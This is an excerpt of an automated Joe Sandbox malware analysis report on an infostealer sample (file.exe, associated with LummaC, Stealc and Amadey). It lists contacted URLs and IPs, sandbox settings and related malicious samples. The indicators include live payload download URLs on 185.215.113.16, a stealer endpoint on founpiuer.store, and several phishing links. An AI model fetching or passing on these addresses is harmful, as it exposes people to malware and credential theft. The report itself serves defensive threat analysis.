                                                                                        http://go.microsoffile.exe, 00000000.00000003.2346557356.000000000585A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2394785291.000000000585A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_129.5.drfalse
                                                                                          high
                                                                                          http://x1.c.lencr.org/0file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://x1.i.lencr.org/0file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://aka.ms/pshelpmechoosechromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                high
                                                                                                https://aka.ms/feedback/report?space=61chromecache_129.5.dr, chromecache_93.5.dr, chromecache_130.5.drfalse
                                                                                                  high
                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://learn-video.azurefd.net/vod/playerchromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                      high
                                                                                                      https://twitter.com/intent/tweet?original_referer=$chromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                        high
                                                                                                        https://github.com/gewarrenchromecache_129.5.drfalse
                                                                                                          high
                                                                                                          https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2076271463.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://polymer.github.io/CONTRIBUTORS.txtchromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                              high
                                                                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIzfile.exe, 00000000.00000003.2105490606.0000000000D64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://185.215.113.16/off/def.exe.exefile.exe, 00000000.00000002.2381732289.0000000000AFA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: phishing
                                                                                                                unknown
                                                                                                                https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_129.5.drfalse
                                                                                                                  high
                                                                                                                  https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_129.5.drfalse
                                                                                                                    high
                                                                                                                    https://client-api.arkoselabs.com/v2/api.jschromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                                        high
                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://github.com/Thrakachromecache_129.5.drfalse
                                                                                                                            high
                                                                                                                            http://polymer.github.io/PATENTS.txtchromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                                              high
                                                                                                                              https://aka.ms/certhelpchromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                                                high
                                                                                                                                http://185.215.113.16/steam/random.exefile.exe, file.exe, 00000000.00000003.2346828021.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2383361557.0000000000D56000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2265417496.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/mairawchromecache_129.5.drfalse
                                                                                                                                        high
                                                                                                                                        http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://schema.orgchromecache_95.5.drfalse
                                                                                                                                            high
                                                                                                                                            http://polymer.github.io/LICENSE.txtchromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                                                              high
                                                                                                                                              https://founpiuer.store/apiderfile.exe, 00000000.00000003.2109025654.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2189751100.00000000057B1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2189791423.00000000057B3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129039550.00000000057B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              unknown
                                                                                                                                              https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2076271463.0000000005AD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://aka.ms/yourcaliforniaprivacychoiceschromecache_129.5.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.cloudflare.com/5xx-error-landingfile.exe, 00000000.00000003.2029094073.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2029739243.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com/nschonnichromecache_129.5.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://github.com/adegeochromecache_129.5.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2105490606.0000000000D64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://github.com/jonschlinkert/is-plain-objectchromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2075170642.00000000057CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://octokit.github.io/rest.js/#throttlingchromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://github.com/js-cookie/js-cookiechromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://185.215.113.16/off/def.exefile.exe, file.exe, 00000000.00000003.2346828021.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2383361557.0000000000D56000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2265417496.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://schema.org/Organizationchromecache_129.5.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://channel9.msdn.com/chromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2048444776.00000000057F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048505280.00000000057F3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048607762.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://founpiuer.store/file.exe, 00000000.00000003.2189581172.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2143646950.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2047732562.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2135876339.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2105490606.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2062812324.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074760157.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2061520618.0000000000D7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://github.com/dotnet/trychromecache_115.5.dr, chromecache_95.5.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    104.21.5.155
                                                                                                                                                                                    founpiuer.storeUnited States
                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    13.107.246.45
                                                                                                                                                                                    s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                    13.107.253.45
                                                                                                                                                                                    s-part-0017.t-0009.fb-t-msedge.netUnited States
                                                                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                    185.215.113.16
                                                                                                                                                                                    unknownPortugal
                                                                                                                                                                                    206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                    216.58.206.68
                                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                    13.107.253.72
                                                                                                                                                                                    s-part-0044.t-0009.fb-t-msedge.netUnited States
                                                                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                    unknownReserved
                                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                                    142.250.186.132
                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                    IP
                                                                                                                                                                                    192.168.2.17
                                                                                                                                                                                    192.168.2.5
                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                    Analysis ID:1550148
                                                                                                                                                                                    Start date and time:2024-11-06 14:38:06 +01:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 7m 8s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:10
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Sample name:file.exe
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@24/70@16/10
                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                    • Number of non-executed functions: 2
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 142.250.185.99, 74.125.206.84, 216.58.206.46, 184.28.89.167, 23.32.186.2, 34.104.35.123, 20.42.73.24, 142.250.184.234, 172.217.16.202, 142.250.181.234, 216.58.206.42, 216.58.212.170, 142.250.186.42, 172.217.16.138, 142.250.185.74, 172.217.18.106, 142.250.186.138, 142.250.184.202, 142.250.186.106, 172.217.23.106, 142.250.185.106, 172.217.18.10, 216.58.206.74, 2.19.126.137, 2.19.126.156, 52.182.143.214, 13.74.129.1, 13.107.21.237, 204.79.197.237, 142.250.185.227, 142.250.185.78
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, onedscolprdeus03.eastus.cloudapp.azure.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.traffic
                                                                                                                                                                                    • Execution Graph export aborted for target file.exe, PID 5508 because there are no executed function
                                                                                                                                                                                    • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • VT rate limit hit for: file.exe
                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    08:38:56API Interceptor22x Sleep call for process: file.exe modified
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    104.21.5.155file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                    r2oC9dueym.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • nam.dcv.ms/BxPVLH2cz4
                                                                                                                                                                                                        13.107.253.45https://u47918368.ct.sendgrid.net/ls/click?upn=u001.-2BOo3JYTQYuIFaBSzf7AB64dVRTqkGjH0MRM8KyM0AcZsOP7y7qpKWukjxhDcw92CbJO47QSxKFDJcDiP6WeaFL-2BnK3EFxpudowoMeNAVdeweBd8-2FWlMYHw0bdH9dmRj9FWWLx9-2FZjKKb84F9ITCdIGxoZiMN3mzzvXx07roy7WVNC3vFCOURYxFpe90m2E8wJ9PxEH58lcyIBohCQwrgcA-3D-3D7Qgj_AsQvLq31PKXxx3tM00egmVFtswxWHNiAKAW7v-2BME9y3foxrTpQ6z5Y5Y3k6TX-2BTbdqWMdZVTacuc-2FsKla-2BQnDyhxuGfrDPGC0inve5ZGuY9bJGKrM5EaK8IdC3aHxgKXMexjApq1Yv-2Fo2nkdHzmaIMX05B-2BRcK00sZCPCageoDEFAP0MeynrbN6eJfLKupbsQbWTUFPTXUzcncjU8U51AySRGzNQgfTZ5bFcAOShlFKqsuf25KciTGdGP3A-2FBofD5YR3osO6IK-2BefoTwxAt1P4CtUrODXihiP08tFb44snucy1SwxfDMueKUMHcRTuAXbf1k4HMxx5M9-2F4k46qOhvuaLiVUWL6XnB96ND-2BJesqeyrDYcH7gQDBkF-2Ft9dOfbph87RveTLjaU71K5zlVGHj5DbweGtprlQzW-2FAVa2qxgamgU-2BdVnaIdAfsqwI00wESnUW9OKgd-2FZSqxAaB9p-2F-2BYoTjgZf-2F43lM89eNMZonRv3e8C1Aoxa-2FsV8mYg89iRruh-2FvRiJkUcrVbbYatzvOSlR7zePoUWntrdLvmh4abI8n-2B4a6l6OHt00KAAzuzuPz5RFpduPDEuP-2FPPfJYC4wrQig4u5dvMcDSr3O5WPP6KupGDnHTn6vziIr23gkn3gj6EeAbpU1HpirN1A7rynpdvPvGTD-2FchgcZzQ9-2B4rUpO1IBcbVKgv5LeX4QGG1wNAdBCEPAUor8s8H1Ni2p3PqFRP6Mx6H3i19ISLPUg1Z-2B5EgTIPf1f4RHs1VwzG1Dq-2BG-2FzvuJxxkNZwyLv4aHan0-2BAU5E63umNxQDiKHthW8CeZp05uXi1-2BiaV-2FzgIRx32rFDuQJkUP6DqfWApsjY1ZCFZPLDZyUpWGwnMcG-2BRW5xv25mekUrT9aB2RxMGLSAJykNRSOSjaz0DAuYI7hPs-2BovbbN1slvb8Jkm1ZsUjPOcqsQ-3DGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                                                          https://u47918366.ct.sendgrid.net/ls/click?upn=u001.skYLek12KWTy-2FVz15U1JGdpJfnayI4kQ0pGqHar3Dl5XD61duaRQIcmphf6sxsCT3pRESnljQSclapQG6uG3pGdVz-2B44bL9s03KAUTE5StMNIlD8xnCLLZ8lGkQWJZW6RJC-2FMS-2FmtqbnkGnTi61-2FLZhA8Cc9B2EegTHLtsNl-2BkepLTVNywnsBwsMX7xHmoWV3Dw2rHKhcl7GdTKnanH-2B2A-3D-3DsAd4_IsYeSBG-2BZ-2BTZ5It1-2BmoDsqC7nKwYR7zCsxLhuNGeEDAE80ci2YLaQMl4Chr-2FJ1Dy-2F1t-2Bt6wYBNbbXZWDZJ-2F9gxipPIVyTE-2BwkCxJb2yh-2FK571oS4WTX4wK-2B6Bz-2By5o6LaoWIUw4RL-2Be7Zu2FVjT9YRZQb18hVaXy01EnbzLh42VW9cm4LoyyvSEHNmuGsq4V3weKi-2B8ktOeXeZJ6itTfNUv90Hzr8Pks2E-2BUaeQAL4JtRydjpVfX1b-2Bb-2Br-2FLCz7N-2FWK5lEkS1jhZiYhjiqJboEKBErmNmNqMjZ-2BwyTOtY3BEE6XfRhXZ5MKCe5e9aBCpDkCtemfmauVKvLSP-2FbQ0Vmybk-2F7qA6I2Ku8cl2S1QWU3bOenut3g1b-2Fjhmr55tVtbCkJFEYXmZH0LATBv2XqsJp7O4OwfKJFhIE0bG6aRwM1uirpzCjO2IaFMBAlTI1SxTdJDdWZHOxzctWmXFVbN942FUcBds73LQ2GOGQP4XYhfMQSMHFId2qF3wvlUByd2ligk1qXM5QRquqHZW2LGZQuY8BJgN-2FcXCuzLwGQggx51jbD-2BaZogYVhObsRQIFw5QRieniieQwSt-2BCtR2cOnQB7wMuO2cen79ZEd3199uy3IVW1-2BOMJ9W6y4H9F7IR9mU2c8eigwx1-2Bv-2B7ZIdRKLM9EPP7tvXzM9KfbzlZXEXm4FEEtRO1Kjwz8Qm3lpEO6z3DYDCbAH3tN-2FdBnl08ntv4xVTHXg9zmsSPDluQjxpAJW97WDEz7bfIYDvII7tVhow1OgNWW3Za5ZIaPFlCUrGxxs4FlaLX4Nyw-2BFQrejqFq1o5ipLur5fLE9E2EFQ65iIHEhVDsb1YYcER4UDPxzNYx5zFubvHiPSjMQ62CeJk-3DGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                                                            http://frenzelit.powerappsportals.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                              https://u47918369.ct.sendgrid.net/ls/click?upn=u001.ZoCZETgJDKD-2FKvq1a-2Bqbn8ta8d94BJ71ZWM4NddFG9BNYa4zSgm5xozG6sQbxmU5D5hL85iqF140GJ6UG5nvQ8h9zqpzZN6TptwRH8YmWqCz4BhhWVyA4-2FGdi78BIf3v-2B7DR6p6O0O2iMltxPh-2BTVZzGBI-2BdwOvbNydWsHD-2FE3jskn-2BWjLG5mEA5NmkZDPRzetlrway-2BFvubwBO4HRvhVg-3D-3Dmeoi_-2Bc-2FE9fHJLEezMYVeHAjWA-2FCLTyAjjdsjmjoMWPOcqKulbzylExHQ2Bq-2F3BWB5j3k2UTXVbxJlycszSZ1lajkNfuZTcVvZ-2FvSGDyQmX-2FtcFOsY2mjWSEq1i80kCvMOrhUl4ALfB0EoZtPz4ZKLJkzU7FgeX-2FT9OOVwrlnZy4n0LZBObWOCx8zKd7nZMhFe-2BZc9Pem0kzkQw2yNab8z35ieg0OqT7JGePwZBZspCJwJURQ2RzMNYu1jql5xUEHxCdthZoQG0oXgKX7EC2zWVbmd3lbuIz4gnLx6gtjvJVPuORshK8UmeaYN3bhRbYtiwa1MzSTAh44aejae4PH1iW9eqQx6mkzXAmSRGDTqlaz-2BTMhcFb2TbX9Ireuri9431lneUhuzyBoFgsxNxrHmewEumQ5Fpbl3DMNlZWY6v-2BZeqOSKoZukPJvFMTp-2B0LlYiW2hSEEHpoW-2Bfkodr-2BXedOkEgHOpb-2BI-2Bo7iRsBMssyauw7e2G-2BtBTPlVRTMUKEi0sHkZnzyDwwvelrsZPDSeuUSJJbF5RsW6PuJ3rHQeLybAr5sY4N1iFLQRl4UXoM-2FW1USqeW-2FW67ju4oKy-2BxxK2RMyt1UamWC1e7ZMaHtLuobdKUFD-2B-2BLBUV-2Bt1L4C-2BjqlcRVfQXoWpIiBUrky3W8HrGlvsfUG6wd83TiHuew-2FQxPfj-2FiZisyJRXvaXYOHAqa17KLb3gmFP-2B5uXU8LjzG0ycYvWam8x9r5ppG8H3M12etKaXYgjAyYUFRLUyjayjoSrQYGFIaA5ZpLf0TnsLO-2F6gNVZ-2FafUtMAjrZaBWKnf4XbPftvvgD-2FYh-2Fjepxm5eyWvZ523sC9u7sDPMnlHy9SJkfmrT2lMQs12qzVb613rQa-2FDElHuue97Dli-2FDJHUvFFkCQGiWlvze9GWny9B9XIMqzHg-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                https://www.canva.com/design/DAGVnZ3mr_Y/4CQQbX1-EKRcha16TVbYxQ/view?utm_content=DAGVnZ3mr_Y&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                  phish_alert_iocp_v1.4.48 (36).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    https://micheline.aceflavall.com/Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                                                                      https://1drv.ms/o/c/66fa7da2ba9759b3/EqcaXs4PlQlIgYgaPtxczNwB_gWaZXRP_eT5RhV50i4cxw?e=5%3aJHIMrP&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        De_posit Confirmati0n_ Mitie.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&esrc=nNeW8FA0xys8Em2FL&source=&cd=tS6T8Tiw9XH&cad=XpPkDfJXVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=am%70%2F%77%77%77%2E%64%65%72%79%61%6E%63%6F%6E%73%75%6C%74%69%6E%67%2E%63%6F%6D%2F%74%31%62%72%6F%77%6E%34%35%2F1112449584/aGVsZW5AY3VyZXBhcmtpbnNvbnMub3JnLnVrGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            s-part-0017.t-0009.t-msedge.nethttps://booking.com@slongre.com/vrmcoabuGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                                            SecuriteInfo.com.Win32.MalwareX-gen.16832.31781.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                                            https://rebrand.ly/32mqjh6Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                                            https://krtra.com/t/onJtp2YcgmoQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                                            nED5QgaQnw.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                                            Gantt_Excel_Pro_Daily_Free1.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                                            Inquiry Order RFQ-012723008.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                                            Gantt_Excel_Pro_Daily_Free1.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                                            http://loginmcsoftmlcrosoftoni365.madrides.copypremium.com/?reactivador/ahora0D1%20/=YWxvbnNvYmFAbWFkcmlkLmVzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 13.107.246.45
                                                                                                                                                                                                                            founpiuer.storefile.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                            • 172.67.133.135
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                            • 104.21.5.155
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 104.21.5.155
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 172.67.133.135
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 172.67.133.135
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.21.5.155
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 104.21.5.155
